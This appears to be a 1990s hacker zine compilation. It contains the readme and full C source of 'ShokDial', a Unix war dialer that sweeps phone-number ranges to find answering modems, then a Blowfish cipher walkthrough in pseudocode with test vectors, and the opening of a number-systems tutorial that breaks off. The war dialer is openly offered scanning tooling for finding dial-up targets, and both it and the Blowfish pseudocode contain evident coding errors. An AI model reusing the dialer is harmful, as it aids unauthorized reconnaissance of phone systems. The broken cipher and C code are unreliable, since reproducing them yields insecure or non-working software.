./jizz Manually Spoofing - The more advanced way to spoof and for use with people that actually know something. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ShokDial - a linux war dialer by Shok I wrote this because someone asked me to, and it's the only war dialer I've seen for linux. I don't like or use war dialers but I decided to write it anyway....oh well. This is new, so it may have a few bugs but it shouldn't have any. If you see a bug or anything, please let me know (mail me at shok@sekurity.org). WHAT YOU NEED TO DO: -------------------- ***YOU NEED TO DO THIS***......... In wardialer.c, at the very top..you will have three #define's you need to change to your modem, etc. #define MODEMPORT "/dev/cua1" This is the COM my modem is on. You NEED to set this to yours. If your modem is on COM1 (assuming you're using linux), then put /dev/cua0 instead of /dev/cua1. However if you are using something like IRIX for example it is not /dev/cua1 (if I recall)...and you'll need to set this to your modem port. -------------------- There is also: #define HANGUPPORT "/dev/ttyS1" You NEED to change this as well, if you put cua0 earlier, put ttyS0 here...if you put cua1 put ttyS1 here.....etc However if you have IRIX or soemthing like that it will be different..... --------------------- Now all you have to do (and this is optional), there is: #define TIMEOUT 30 You just set this to how long you will wait for it to try to dial a number and this will disconnect after so long. Type shokdial -h for help/options... Enjoy! Serial programming for unix.....boy this stuff is fun. Well unix is famous for it's special files. The modem is just a file you can open(), read(), and write() to...for that reason this program can be used on all unixs'. The only thing different that needs to be changed, is the #define MODEMPORT "/dev/cua1", because most unix/unix clones have their own modem port. For example /dev/ttyS? which is COM1 (to the DOS users), would be /dev/ttym? in IRIX. Now once this program opens the modem (via device/special file) for reading/writing, it will write() to it, and send it standard modem instructions like +++ATH, ATZ etc....this comes before any dialing to get the modem ready....we also use a function to check for "OK" so we know that all is well. On receiving this, then enter the number we want to dial into a character buffer, append a "\r" to it (to it actually sends the command), we then write(fd (the file desc. for /dev/cua1), thebufwiththenum, strlen(thebufwiththenum)); Now once you do this..you can't write "+++ATH" to it, because it will send that as the login name (assuming you've connected to a host), so what I did, was I opened the other modem port (there are two, /dev/cua0 and /dev/ttyS0 are essentially the same thing (both COM1 to explain it easier), one is used for dialing out (cua?) and one is used for dialling in and out (ttyS?). So I opened up the other port and used that to send the command to hang up. But all the other stuff isn't complex, they are all C primitive instructions like ScanMin++; which would increse ScanMin by 1, repeat a while loop, and then the next strcat(phonenum, ScanMin); ... would dial the next number......you get the idea. That's about all there really is to say about the technical stuff about it. Oh yeah one thing.....when it connects, it looks for the string "CONNECT" returned from the modem serial file. You won't get this message from faxes as you will only get this message when the connection is complete, so this will only return *** CONNECT *** if it was a modem. It will both output to the screen and logfile *** CONNECT *** to 1-xxx-xxx-xxxx. You can use local or long distance, although international numbers haven't been added at this time (not hard to do just didn't care to add an extra scanf and an extra CountryCode variable ;) About ShokDial (it's temp name for now) --------------------------------------- This supports random scanning (pseudorandom to be honest, heh) and sequential (the range you specified and up) scanning. You can give it a range too but that still does under sequential scanning. To use random scanning use 'shokdial -r', otherwise it will by default use sequential scanning. For the other options type 'shokdial -h'. You want to keep track of the version because I'd almsot guarntee this program is going to continue changing. I need to add some ncurses GUI effects (heh) and a function to resume scanning for those of you who are too lazy to even look at the (by default) wardialer.log and get the last number it dialed (assuming you used sequential scanning) and entering that as the Scan number to begin on! It will output to wardialer.log and on to the screen. If you have BEEP = WANTBEEP in the Makefile, it will beep when it connects to a host. That's about all I really have to say about it. I don't actually use war dialers (really), so I haven't actually tested this (sorry if there are any problems but there shouldn't be)....if you do however find a problem, please let me know! I will fix it and send out a patched version.....you can get all of them from ftp.janova.org or www.janova.org. Enjoy ;) Shok To Do: - Add a resume function - Any good ideas/features that should me added? Mail me at shok@sekurity.org if you think of something useful (don't mention a GUI or anything though anyway). ------------- Makefile: ------------ CC = gcc #CC = cc CFLAGS = #CFLAGS = -g BEEP = WANTBEEP #BEEP = NOWANTBEEP #--------------------------------- all: shokdial shokdial: shokdial.c errors.c validate.c $(CC) $(CFLAGS) -D$(BEEP) -o shokdial shokdial.c errors.c validate.c ---------- shokdial.c ---------- /* ShokDial */ /* This is (I have never seen one anyway, I apologize if I'm wrong) */ /* the first war dialer that I've ever seen for unix. This will */ /* compile on most/all unixs' (I didn't use any spiffy or complex */ /* functions). */ /* Enjoy, */ /* --==+*~(Shok)~*+==-- */ #include #include #include #include #include #include #include #include #include #define ERROR -1 #define LOGFILE "wardial.log" /* Used as default for logging */ /* unless you change this define */ /* or specify it as an option */ #define TIMEOUT 25 /* YOU WANT TO CONFIGURE THIS!!! */ /* This is how long it will wait until it */ /* gives up. */ /* You can do: */ /* ln -s /dev/cua1 /dev/modem */ /* or change this to /dev/cua1 (or whatever your COM is) */ /* cua0 = COM1 cua1 = COM2 */ #define MODEMPORT "/dev/cua1" /* Same as above..... */ /* ttyS0 = COM1 ttyS1 = COM2 */ #define HANGUPPORT "/dev/ttyS1" /* Global variables */ /* ---------------- */ int fd; /* fd for modem */ int numbytes; /* To verify that all the bytes were written */ int random; /* Use random scanning if this is set */ char *ProgName; /* Um duh. */ char LocalOrLong[2]; /* Dialing long distance of local */ int First3Digits; /* Such as "555" of 555-XXXX */ /* However this also serves as the area code */ /* for a long distance number */ int Last3Digits; /* Used as XXX-555-XXXX */ int ScanMin; /* Number to scan from....like 0000 and up */ int ScanMax; /* Stop scanning when this number is reached */ char *LogFile; /* Where to log connections */ char buf[512]; /* Buffer for strings returned by modem */ FILE *logfile; /* for the log file */ /* FILE *resume; */ /* To resume scanning where left off */ struct termios options; /* Baud rate, modes, etc. */ /* Function prototypes */ /* ------------------- */ void usage(void); /* Help/usage */ void version(void); /* Display version */ void intro(void); /* An introduction */ void get_num(void); /* Get phone number and scan prefix */ void get_scannum(void); /* Get range to scan */ void open_port(void); /* Open modem port for dialing */ void set_options(void); /* Set baud rate, termios, etc. */ void init_modem(void); /* Initialize the modem */ void dial_number(void); /* Dial the number */ void hangup(void); /* Hang up modem. */ void sighandler(int signum); /* Used when signals are received */ /* Check read/write/opens for errors */ void check_for_error(int fd, int num, char *s); /* Check if the phone num was valid */ void local_validnum(int digits); void long_validnum(int firstdigits, int lastdigits); void main(int argc, char **argv) { struct sigaction sig, sigdef; system("clear"); /* ------------------------------------------------- */ ProgName = argv[0]; if (argc == 2) { if ((strcasecmp(argv[1], "-r")) == 0) random = 1; else if ((strcasecmp(argv[1], "-h")) == 0) usage(); else if ((strcasecmp(argv[1], "-help")) == 0) usage(); else if ((strcasecmp(argv[1], "--help")) == 0) usage(); else if ((strcasecmp(argv[1], "-v")) == 0) version(); else if ((strcasecmp(argv[1], "--version")) == 0) version(); else LogFile=argv[1]; } else if (argc == 3) { if ((strcasecmp(argv[1], "-r")) == 0) { random = 1; LogFile=argv[2]; } else usage(); } else if (argc > 3) usage(); else { fprintf(stderr, "No log file specified....using %s as log file.\n", LOGFILE); fprintf(stderr, "-r (random scanning) option not given, using sequential scanning instead.\n"); LogFile=LOGFILE; } /* -------------------------------------------------- */ sleep(4); system("clear"); /* Clear the screen */ /* -------------------------------------------------- */ sig.sa_handler = sighandler; sigdef.sa_handler = SIG_IGN; sigemptyset (&sig.sa_mask); sig.sa_flags = 0; sigaction(SIGHUP, NULL, &sigdef); sigaction(SIGINT, &sig, NULL); sigaction(SIGTERM, &sig, NULL); /* -------------------------------------------------- */ logfile=fopen(LogFile, "a"); /* resume=fopen(".resume", "w"); */ intro(); if (random != 1) { get_num(); /* Get the phone number */ get_scannum; /* Get the range to scan */ } open_port(); /* Open MODEMPORT (by default /dev/cua1) */ set_options; /* Set baud rate, terminal modes, etc. */ init_modem(); /* Send the modem ATZ etc.. */ dial_number(); /* Dial the number/do the scanning */ hangup(); /* Disconnect */ close(fd); } /* -------------------------------------------------- */ void version(void) { fprintf(stderr, "This is ShokDial, v1.0...please keep notice of this.\n"); fprintf(stderr, "in case this program under goes some new features etc.\n"); fprintf(stderr, "\t\t--==+*~(Shok)~*+==--\n"); exit(0); } /* -------------------------------------------------- */ void usage(void) { fprintf(stderr, "Usage: %s [options] [logfile]\n", ProgName); fprintf(stderr, "Options:\n"); fprintf(stderr, "-r for random (as opposed to sequential) scanning\n"); fprintf(stderr, "-h for help....what you're seeing now"); fprintf(stderr, "-v for the version...because this will probably undergo changes\n\n"); fprintf(stderr, "If no log file is specified, \"%s\" is used.\n", LOGFILE); exit(0); } /* -------------------------------------------------- */ void intro(void) { printf("Shok's war dialer for UNIX (affectionately known as ShokDial).....\n"); printf("------------------------------------------------------------------\n"); printf("This is still in the beta version so it doesn't have a nice\n"); printf("graphical interface yet.\n"); printf("\nWell what you do here, is enter 0000 for the range to begin\n"); printf("scanning and 9999 to end scanning if you want to scan all the\n"); printf("possible ranges, but you can put 4444 for the nmber to start\n"); printf("and 5555 for the number to begin to scan XXX-[4444-5555] for\n"); printf("local numbers and it would be 1-XXX-XXX-[4444-5555] for long\n"); printf("distance.\n"); printf("\nAlso, you can use random scanning (as opposed to sequential\n"); printf("scanning) by specifying the \"-r\" option...type:\n"); printf("%s -h for help.\n\n", ProgName); printf("Anyway..enjoy!\n"); printf("\t\t\t--==+*~(Shok)~*+==--\n\n"); printf("Hit any key to continue.\n"); getchar(); } /* -------------------------------------------------- */ void get_num(void) { printf("Scanning..\n(L)ocal, Long (D)istance\n"); scanf("%2s", &LocalOrLong); if((strncasecmp(LocalOrLong, "L", 1)) == 0) { printf("Enter number to dial (753 for 753-XXXX): "); scanf("%d", &First3Digits); local_validnum(First3Digits); } else if ((strncasecmp(LocalOrLong, "D", 1)) == 0) { printf("Enter number to dial (555555 for 555-555-XXXX): "); scanf("%3d%3d", &First3Digits, &Last3Digits); long_validnum(First3Digits, Last3Digits); } else { fprintf(stderr, "You must specify L for local or D for Long Distance\n"); exit(ERROR); } } /* -------------------------------------------------- */ void get_scannum(void) { printf("Enter number to start scanning at: "); scanf("%4d", &ScanMin); putchar('\n'); if ((ScanMin >= 0) && (ScanMin <= 9999)) { /* Do nothing */ } else { fprintf(stderr, "%d is invalid.\nScanning range must be 0000-9999\n", ScanMin); exit(ERROR); } printf("Enter number to end scanning: "); scanf("%4d", &ScanMax); putchar('\n'); if ((ScanMax > ScanMin) && (ScanMax > 0) && (ScanMax <= 9999)) { /* Do nothing */ } else { fprintf(stderr, "%d is invalid.\nScanning range must be 0000-9999\n", ScanMax); exit(ERROR); } } /* -------------------------------------------------- */ void open_port(void) { printf("Opening modem for dialing...\n"); fd = open(MODEMPORT, O_RDWR | O_NOCTTY | O_NDELAY); if (fd == ERROR) { perror("open"); exit(ERROR); } } /* -------------------------------------------------- */ void set_options(void) { tcgetattr(fd, &options); options.c_cflag |= (CLOCAL | CREAD); options.c_cflag &= ~PARENB; options.c_cflag &= ~CSTOPB; options.c_cflag &= ~CSIZE; options.c_cflag |= CS8; options.c_iflag |= (INPCK | ISTRIP); options.c_lflag &= ~(ICANON | ECHO | ISIG); options.c_oflag &= ~OPOST; cfsetispeed(&options, B115200); cfsetospeed(&options, B115200); tcsetattr(fd, TCSANOW, &options); } /* -------------------------------------------------- */ void init_modem(void) { printf("Initializing modem (port %s)....\n", MODEMPORT); /* Hang up modem if it's already on */ hangup(); numbytes=write(fd, "ATZ\r", 4); check_for_error(fd, numbytes, "write"); sleep(3); } /* -------------------------------------------------- */ void dial_number(void) { char phonenum[20]; /* If local: phonenum = First3Digits + ScanMin */ /* If long distance: phonenum = */ /* First3Digits + Last3Digits + ScanMin */ char phonenum1[20]; /* Same as above except this has "\r" as well */ char connectmsg[50]; /* the message to the log file */ printf("Giving a %s second connection timeout", TIMEOUT); if ((strncasecmp(LocalOrLong, "L", 1)) == 0) { /* Local call */ while (1) { if (random == 1) ScanMin = (rand() % 8889) + 1111; strcat(phonenum, (char *)First3Digits); strcat(phonenum, (char *)ScanMin); strcpy(phonenum1, (char *)phonenum); strcat(phonenum1, "\r"); if (random != 1) { printf("Dialing %d-%d.\n", First3Digits, ScanMin); numbytes = write(fd, phonenum1, strlen(phonenum1)); check_for_error(fd, numbytes, "write"); } else { /* if random == 1 */ printf("Dialing %d-%d.\n", First3Digits, ScanMin); numbytes = write(fd, phonenum1, strlen(phonenum1)); check_for_error(fd, numbytes, "write"); } sleep(TIMEOUT); /* How long to wait for timeout */ numbytes = read(fd, buf, 511); check_for_error(fd, numbytes, "read"); /* Compare the string with "CONNECT" */ if((strncmp(buf, "CONNECT", 7)) == 0) { #ifdef WANTBEEP fputc('\a', stderr); #endif fprintf(stderr, "*** CONNECT *** to %d-%d\n", First3Digits, ScanMin); /* Log it */ sprintf(connectmsg, "*** CONNECT *** to %d-%d\n", First3Digits, ScanMin); fputs(connectmsg, logfile); bzero(connectmsg, 50); /* Clear the message */ } bzero(buf, 512); /* Reset buffer */ hangup(); if (random != 1) { /* Increase ScanMin so it scans for the next number */ ScanMin += 1; if (ScanMin > ScanMax) { fputc('\a', stderr); fprintf(stderr, "ALL DONE SCANNING....THANKS FOR USING\n"); exit(0); } } bzero(phonenum, 20); /* Clear the phone number */ bzero(phonenum1, 20); /* Ditto */ } /* End of while loop */ } /* End of if */ else { /* if LocalOrLong == "D" (Long Distance call) */ while(1) { if (random == 1) ScanMin = (rand() % 8889) + 1111; strcat(phonenum, "1"); strcat(phonenum, (char *)First3Digits); /* Area Code */ strcat(phonenum, (char *)Last3Digits); /* 1-XXX-555-XXXX */ strcat(phonenum, (char *)ScanMin); /* 1-XXX-XXX-0000 */ strcpy(phonenum1, (char *)phonenum); /* Copy it to another */ strcat(phonenum1, "\r"); /* buf to append "\r" to it */ if (random != 1) { printf("Dialing 1-%d-%d-%d.\n", First3Digits, Last3Digits, ScanMin); numbytes = write(fd, phonenum1, strlen(phonenum1)); check_for_error(fd, numbytes, "write"); } else { /* if random == 1 */ printf("Dialing 1-%d-%d-%d.\n", First3Digits, Last3Digits, ScanMin); numbytes = write(fd, phonenum1, strlen(phonenum1)); check_for_error(fd, numbytes, "write"); } sleep(TIMEOUT); /* How long to wait for timeout */ numbytes = read(fd, buf, 511); check_for_error(fd, numbytes, "read"); /* Compare the string with "CONNECT" */ if((strncmp(buf, "CONNECT", 7)) == 0) { fputc('\a', stderr); fprintf(stderr, "*** CONNECT *** to 1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin); /* Log it */ sprintf(connectmsg, "*** CONNECT *** to 1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin); fputs(connectmsg, logfile); bzero(connectmsg, 50); /* Clear the message */ } bzero(buf, 512); /* Reset buffer */ hangup(); if (random != 1) { /* Increase ScanMin so it scans for the next number */ ScanMin += 1; if (ScanMin > ScanMax) { fputc('\a', stderr); fprintf(stderr, "ALL DONE SCANNING....THANKS FOR USING\n"); break; } } bzero(phonenum, 20); /* Clear the phone number */ bzero(phonenum1, 20); /* Ditto */ } /* End of while loop */ } /* End of if/else loop */ fclose(logfile); } /* End of dial_num */ void hangup(void) { /* After testing put this in the init_modem() section */ /* for optimize it. */ int fd1; /* fd for modem (hang up) */ fd1=open(HANGUPPORT, O_RDWR | O_NOCTTY | O_NDELAY); if (fd1 == ERROR) { perror("open"); close(fd1); close(fd); exit(ERROR); } numbytes=write(fd1, "+++\r", 4); check_for_error(fd1, numbytes, "write"); sleep(1); numbytes=write(fd1, "ATH\r", 4); check_for_error(fd1, numbytes, "write"); sleep(3); /* Should/will check for "OK */ close(fd1); } void sighandler(int signum) { char message[50]; fprintf(stderr, "Receive signal to quit....closing up modem, logging last number dialed,\nand exitting\n"); if (random != 1) fprintf(stderr, "Last number dialed was: "); if((strncasecmp(LocalOrLong, "L", 1)) == 0) { if (random != 1) { sprintf(message, "%d-%d\n", First3Digits, Last3Digits); fprintf(stderr, message); fprintf(logfile, message); /* fprintf(resume, "%d%d\n", First3Digits, Last3Digits); */ } } else { /* if LocalOrLong == "D" */ if (random != 1) { sprintf(message, "1-%d-%d-%d\n", First3Digits, Last3Digits, ScanMin); fprintf(stderr, message); fprintf(logfile, message); /* fprintf(resume, "1%d%d%d\n", First3Digits, Last3Digits, ScanMin); */ } } /* hangup(); */ close(fd); /* fclose(resume); */ fclose(logfile); exit(ERROR); } /* void resume(void) { } */ ----------- validate.c ----------- /* Functions: */ /* local_validnum */ /* long_validnum */ #include #include #define ERROR -1 /* Check if it was a valid local number */ void local_validnum(int digits) { if ((digits > 111) && (999 > digits)) { /* Do nothing */ } else { fprintf(stderr, "%d is invalid.\nThe number must be 111-999\n", digits); exit(ERROR); } } void long_validnum(int firstdigits, int lastdigits) { if (((firstdigits > 111) && (firstdigits < 999)) && ((lastdigits > 111) && (lastdigits < 999))) { /* Do nothing */ } else { fprintf(stderr, "%d%d is invalid.\nThe number must 111111-999999\n", firstdigits, lastdigits); exit(1); } } --------- errors.c --------- /* Functions: */ /* check_for_error */ #include #include #define ERROR -1 void check_for_error(int fd, int num, char *s) { if (num == ERROR) { fprintf(stderr, "Error: Unable to %s all the bytes.\n", s); hangup(); close(fd); exit(ERROR); } } ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ The Blowfish Algorithm: A Look Under The Hood by The Messiah Contents * Introduction * Key Setup * Encryption * Decryption * Review * Test Vectors INTRODUCTION: The Blowfish encryption algorithm is one of the most well-known encryption algorithms in the public domain. It was written by noted cryptologist Bruce Schneier, and placed in the public domain in 1994. It uses a variable-size key (from 32 to 448 bits), has a 64-bit blocksize, and encrypts the plaintext 16 times, or "rounds." It is a symetric algorithm, meaning the key used to encrypt is the same key used to decrypt. It was designed to run best in software implementations, as opposed to DES, which was designed to run in hardware implementations. KEY SETUP: Blowfish has a complex key setup required before any encryption or decryption can be done. This is the most complicated part of the algorithm. P-array: The P array is an array of 18 32-bit entries- array[1..18] of LongInt; S-Boxes: There are 4 S-boxes, each with 256 32-bit entries- array[0..255] of LongInt; 1.) Initialize the P-array and S-boxes in order with the hexadecimal digits of Pi, starting from the .1 place. for i := 1 to 18 do Parray[i] := GetPiDigit(i); for i := 0 to 255 do SBox1[i] := GetPiDigit(i+19); for i := 0 to 255 do SBox2[i] := GetPiDigit(i+257); for i := 0 to 255 do SBox3[i] := GetPiDigit(i+513); for i := 0 to 255 do SBox4[i] := GetPiDigit(i+787); 2.) Cycle through the P-array, XORing the entry with a 32-bit value from the passphrase. Len : Byte; PassStr : String; password : array[1..14] of LongInt; Move(PassStr, password, Length(PassStr)); Len := Length(PassStr); if Len mod 4 <> 0 then Inc(Len); for i := 1 to Len do for j := i to Len do Parray[j] := Parray[j] xor password[j]; for i := Len downto 1 do for j := Len downto i do Parray[j] := Parray[j] xor password[j]; 3.) Encrypt an all-zero string wil the current S-boxes and replace P-array[1] and P-array[2] with the value. (See the encryption section for more info) zeros : TCipherBlock; zeros[0] := 0; zeros[1] := 0; zero := Encrypt(zero); Parray[1] := zeros[0]; Parray[2] := zeros[1]; 4.) Fill the rest of the P-array and S-boxes in order, using the output of the encrypted string, changing the string to the last encrypted one: i := 3; while i <> 18 do begin zero := Encrypt(zero); Parray[i] := zeros[0]; Parray[i+1] := zeros[1]; Inc(i,2); end; i := 0; while i <> 255 do begin zero := Encrypt(zero); SBox1[i] := zeros[0]; SBox1[i+1] := zeros[1]; Inc(i,2); end; and so on.... ENCRYPTION: Encryption is done with two parts- the main part, and the F function. 1.) The F function divides the left half of a cipherblock (a 32-bit value) into four values and encrypts them with the S-boxes. function F_Funct(Input : LongInt) : LongInt; var foo : array[0..3] of Byte; begin Move(Input, foo, 8); F_Funct := (SBox1[foo[0]] + SBox2[foo[1]] mod 232) xor SBox3[foo[2]]) + SBox4[foo[3]] mod 232; end; 2.) The main part encrypts a 64-bit long block (two LongInts): type TCipherBlock = array[0..1] of LongInt; function Encrypt(Input : TCipherBlock) : TCipherBlock; var I : Byte; bin, bash : LongInt; foo : TCipherBlock; begin foo := Input; for i := 1 to 16 do (* number of rounds *) begin foo[0] := foo[0] xor Parray[i]; foo[1] := F_Funct(foo[0]) xor foo[1]; bin := foo[0]; foo[1] := foo[0]; foo[0] := bin; bin := foo[0]; foo[1] := foo[0]; foo[0] := bin; foo[1] := foo[1] xor Parray[17]; foo[0] := foo[0] xor Parray[18]; end; Encrypt := foo; end; DECRYPTION: Decryption is the same as encryption, except it uses the P-array backwards. 1.) Decryption function: function Decrypt(Input : TCipherBlock) : TCipherBlock; var I : Byte; bin, bash : LongInt; foo : TCipherBlock; begin foo := Input; for i := 16 downto 1 do begin foo[0] := foo[0] xor Parray[i]; foo[1] := F_Funct(foo[0]) xor foo[1]; bin := foo[0]; foo[1] := foo[0]; foo[0] := bin; bin := foo[0]; foo[1] := foo[0]; foo[0] := bin; foo[1] := foo[1] xor Parray[18]; foo[0] := foo[0] xor Parray[17]; end; Decrypt := foo; end; REVIEW: Ahh, how I love being a critic. Blowfish is one of my favorite algorithms, simply because it has the largest key size, is VERY fast, and is public domain. It is relatively new, but so far all crypanalysis has found no real flaws. The only thing I know of is a slight weakness in 14-round variants of Blowfish, but most, if not all, implementations of Blowfish use the 16-round specs. Blowfish is simple, fairly easy to implement (the only hard part for me was finding all those digits of Pi), and VERY VERY fast. In a recent speed test using an optimized implementation of Blowfish, it used only 18 cycles per encrypted byte. Since it is one of the newer algorithms, it was designed with modern computing power in mind, unlike DES, which has fallen to brute force attacks. It's also in the public domain, unlike IDEA, so you may use it in a commercial application without having to pay royalties. I would use this over most other algorithms for communication (in CFB mode), or file storage, unless speed was the highest priority. TEST VECTORS: Should you be making your own implementation of Blowfish, here's Eric Young's test vectors- All data is shown as a hex string with 012345 loading as data[0]=0x01; data[1]=0x23; data[2]=0x45; ecb test data (taken from the DES validation tests) key bytes clear bytes cipher bytes 0000000000000000 0000000000000000 4EF997456198DD78 FFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFF 51866FD5B85ECB8A 3000000000000000 1000000000000001 7D856F9A613063F2 1111111111111111 1111111111111111 2466DD878B963C9D 0123456789ABCDEF 1111111111111111 61F9C3802281B096 1111111111111111 0123456789ABCDEF 7D0CC630AFDA1EC7 0000000000000000 0000000000000000 4EF997456198DD78 FEDCBA9876543210 0123456789ABCDEF 0ACEAB0FC6A0A28D 7CA110454A1A6E57 01A1D6D039776742 59C68245EB05282B 0131D9619DC1376E 5CD54CA83DEF57DA B1B8CC0B250F09A0 07A1133E4A0B2686 0248D43806F67172 1730E5778BEA1DA4 3849674C2602319E 51454B582DDF440A A25E7856CF2651EB 04B915BA43FEB5B6 42FD443059577FA2 353882B109CE8F1A 0113B970FD34F2CE 059B5E0851CF143A 48F4D0884C379918 0170F175468FB5E6 0756D8E0774761D2 432193B78951FC98 43297FAD38E373FE 762514B829BF486A 13F04154D69D1AE5 07A7137045DA2A16 3BDD119049372802 2EEDDA93FFD39C79 04689104C2FD3B2F 26955F6835AF609A D887E0393C2DA6E3 37D06BB516CB7546 164D5E404F275232 5F99D04F5B163969 1F08260D1AC2465E 6B056E18759F5CCA 4A057A3B24D3977B 584023641ABA6176 004BD6EF09176062 452031C1E4FADA8E 025816164629B007 480D39006EE762F2 7555AE39F59B87BD 49793EBC79B3258F 437540C8698F3CFA 53C55F9CB49FC019 4FB05E1515AB73A7 072D43A077075292 7A8E7BFA937E89A3 49E95D6D4CA229BF 02FE55778117F12A CF9C5D7A4986ADB5 018310DC409B26D6 1D9D5C5018F728C2 D1ABB290658BC778 1C587F1C13924FEF 305532286D6F295A 55CB3774D13EF201 0101010101010101 0123456789ABCDEF FA34EC4847B268B2 1F1F1F1F0E0E0E0E 0123456789ABCDEF A790795108EA3CAE E0FEE0FEF1FEF1FE 0123456789ABCDEF C39E072D9FAC631D 0000000000000000 FFFFFFFFFFFFFFFF 014933E0CDAFF6E4 FFFFFFFFFFFFFFFF 0000000000000000 F21E9A77B71C49BC 0123456789ABCDEF 0000000000000000 245946885754369A FEDCBA9876543210 FFFFFFFFFFFFFFFF 6B5C5A9C5D9E0A5A set_key test data data[8]= FEDCBA9876543210 c=F9AD597C49DB005E k[ 1]=F0 c=E91D21C1D961A6D6 k[ 2]=F0E1 c=E9C2B70A1BC65CF3 k[ 3]=F0E1D2 c=BE1E639408640F05 k[ 4]=F0E1D2C3 c=B39E44481BDB1E6E k[ 5]=F0E1D2C3B4 c=9457AA83B1928C0D k[ 6]=F0E1D2C3B4A5 c=8BB77032F960629D k[ 7]=F0E1D2C3B4A596 c=E87A244E2CC85E82 k[ 8]=F0E1D2C3B4A59687 c=15750E7A4F4EC577 k[ 9]=F0E1D2C3B4A5968778 c=122BA70B3AB64AE0 k[10]=F0E1D2C3B4A596877869 c=3A833C9AFFC537F6 k[11]=F0E1D2C3B4A5968778695A c=9409DA87A90F6BF2 k[12]=F0E1D2C3B4A5968778695A4B c=884F80625060B8B4 k[13]=F0E1D2C3B4A5968778695A4B3C c=1F85031C19E11968 k[14]=F0E1D2C3B4A5968778695A4B3C2D c=79D9373A714CA34F k[15]=F0E1D2C3B4A5968778695A4B3C2D1E c=93142887EE3BE15C k[16]=F0E1D2C3B4A5968778695A4B3C2D1E0F c=03429E838CE2D14B k[17]=F0E1D2C3B4A5968778695A4B3C2D1E0F00 c=A4299E27469FF67B k[18]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011 c=AFD5AED1C1BC96A8 k[19]=F0E1D2C3B4A5968778695A4B3C2D1E0F001122 c=10851C0E3858DA9F k[20]=F0E1D2C3B4A5968778695A4B3C2D1E0F00112233 c=E6F51ED79B9DB21F k[21]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011223344 c=64A6E14AFD36B46F k[22]=F0E1D2C3B4A5968778695A4B3C2D1E0F001122334455 c=80C7D7D45A5479AD k[23]=F0E1D2C3B4A5968778695A4B3C2D1E0F00112233445566 c=05044B62FA52D080 k[24]=F0E1D2C3B4A5968778695A4B3C2D1E0F0011223344556677 chaining mode test data key[16] = 0123456789ABCDEFF0E1D2C3B4A59687 iv[8] = FEDCBA9876543210 data[29] = "7654321 Now is the time for " (includes trailing '\0') data[29] = 37363534333231204E6F77206973207468652074696D6520666F722000 cbc cipher text cipher[32]= 6B77B4D63006DEE605B156E27403979358DEB9E7154616D959F1652BD5FF92CCE7 cfb64 cipher text cipher[29]= E73214A2822139CAF26ECF6D2EB9E76E3DA3DE04D1517200519D57A6C3 ofb64 cipher text cipher[29]= E73214A2822139CA62B343CC5B65587310DD908D0C241B2263C2CF80DA ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Learning to Count All Over Again by Bronc Buster (ww.showdown.org) (bbuster@succeed.net) When I read 2600 I see a lot of the other readers are young people, and a lot of them are clueless about what makes this world go around. Well for anyone who's been to my site or talked to me, they know that I like to break down things into layman's terms. So anyone that might read what I write, will come away with an understanding of the subject rather then learning a ton of new acronyms and their eyes glazing over as they pass out. Well this article is going to focus on numbers and how to count with them among other things. I know what you're thinking, but read on, as I'm not talking about 1 + 1 = 2. I'm talking complex number systems using different bases of numbers and sometimes using letters instead of numbers. I'm talking about getting down to the computer level and why this is so important. Computers talk with numbers. Zeros, 0, and Ones, 1. Over time we have figured out ways to get them to understand Base 8, or Octal numbers, and Base 16 numbers, Hexadecimal, or HEX as it's more well known as, but they are still based on the 0 and the 1. Well let's start with the basics and move on from there. How do we count in Binary, with 0 and 1? Heck with only 2 numbers how are you going to make a number like 27? In Assembly classes they teach a column method to learn how to count and I like it, so I'll use it to. So here we go, I'll briefly go over the 3 different number systems, show you how to read them with a chart and what their bases are along with the number and symbols they use to function. Then I'll show you how they sign numbers to show positive and negative numbers, along with basic adding and subtracting. Then to wrap it up I'll tell you why it's very important for anyone in the hacking scene to understand these very basic operations and what usage it has (can you say Buffer Overflow?). Counting Binary ------------------ Binary is the basic low level 0 and 1, the only two things a computer can really understand. It's like and on and off switch, that's all it can do. So they came up with patterns of 0 and 1 that stood for other numbers so we could count and perform other operations all based on the power system for the number 2. Read 2^3 is 2 raised to the 3rd power, or 8, the top row of numbers. 16 8 4 2 1 2^4 | 2^3 | 2^2 | 2^1 | 2^0 ---------------------------------------- binary = base 10 0 = 0 0 = 0 1 = 1 1 = 1 1 0 = 2 10 = 2 1 1 = 3 1 1 = 3 1 0 0 = 4 1 0 0 = 4 1 0 1 = 5 1 0 1 = 5 1 1 0 = 6 1 1 0 = 6 1 1 1 = 7 1 1 1 = 7 1 0 0 0 = 8 1 0 0 0 = 8 1 0 0 1 = 9 1 0 0 1 = 9 1 0 1 0 = 10 1 0 1 0 = 10 As you see, it's simple enough after you get the patterns down, and if you notice, it's repeating. After going through the cycle, you add another 1 to the end and repeat the cycle for the new ending 1. It may take some time getting used to reading it, but after a few minutes you can pick it up pretty easily. Well this is all fine and dandy, now you can read binary, so lets move on to base 8, or octal. Counting Octal ------------------ Well since binary is base 2, and octal is base 8 we need a new set of numbers. Remember binary has 2 numbers, 0 and 1, octal therefore must have 8; 0,1,2,3,4,5,6,7. Much like binary we can make a column chart to read these numbers. 4096 512 64 8 1 8^4 | 8^3 | 8^2 | 8^1 | 8^0 ------------------------------------------- 0 = 0 1 = 1 2 = 2 3 = 3 4 = 4 5 = 5 6 = 6 7 = 7 1 0 = 8 1 1 = 9 1 2 = 10 1 1 6 = 78 Notice that the octal number are cubes of the binary numbers, sense 2^3 is 8. i.e. 64 = 8^2 or (2^3)^2. This 